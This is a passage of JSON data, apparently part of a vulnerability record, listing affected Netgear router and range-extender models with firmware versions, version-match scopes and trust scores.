"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "ex6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.34_1.0.70"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "wn2000rpt",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.57"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "d1500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.25"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.25"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50 0.0.50"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.55"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.26"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.31"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.27"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.28"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.55"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "ex2700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "ex2700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.16 1.1.130"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.56"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.62"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.64"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.74"
},
{
"model": "ex6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "ex6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "ex7300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.17"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.7"
},
{
"model": "jwnr2010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "pr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "pr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.17"
},
{
"model": "pr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.18"
},
{
"model": "pr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.7"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6 10.1.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8 10.0.77"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.2 1.1.93"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.112"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.116"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.122"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.124"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.130"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.16"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.20"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.28"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.36"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.38"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.42"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r9000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.6"
},
{
"model": "wn2000rpt",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "wn2000rpt",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wn2000rpt",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "wn2500rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.50"
},
{
"model": "wn3000rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wn3100rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "wn3100rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "wn3100rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.88"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.92"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.88"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.90"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.92"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
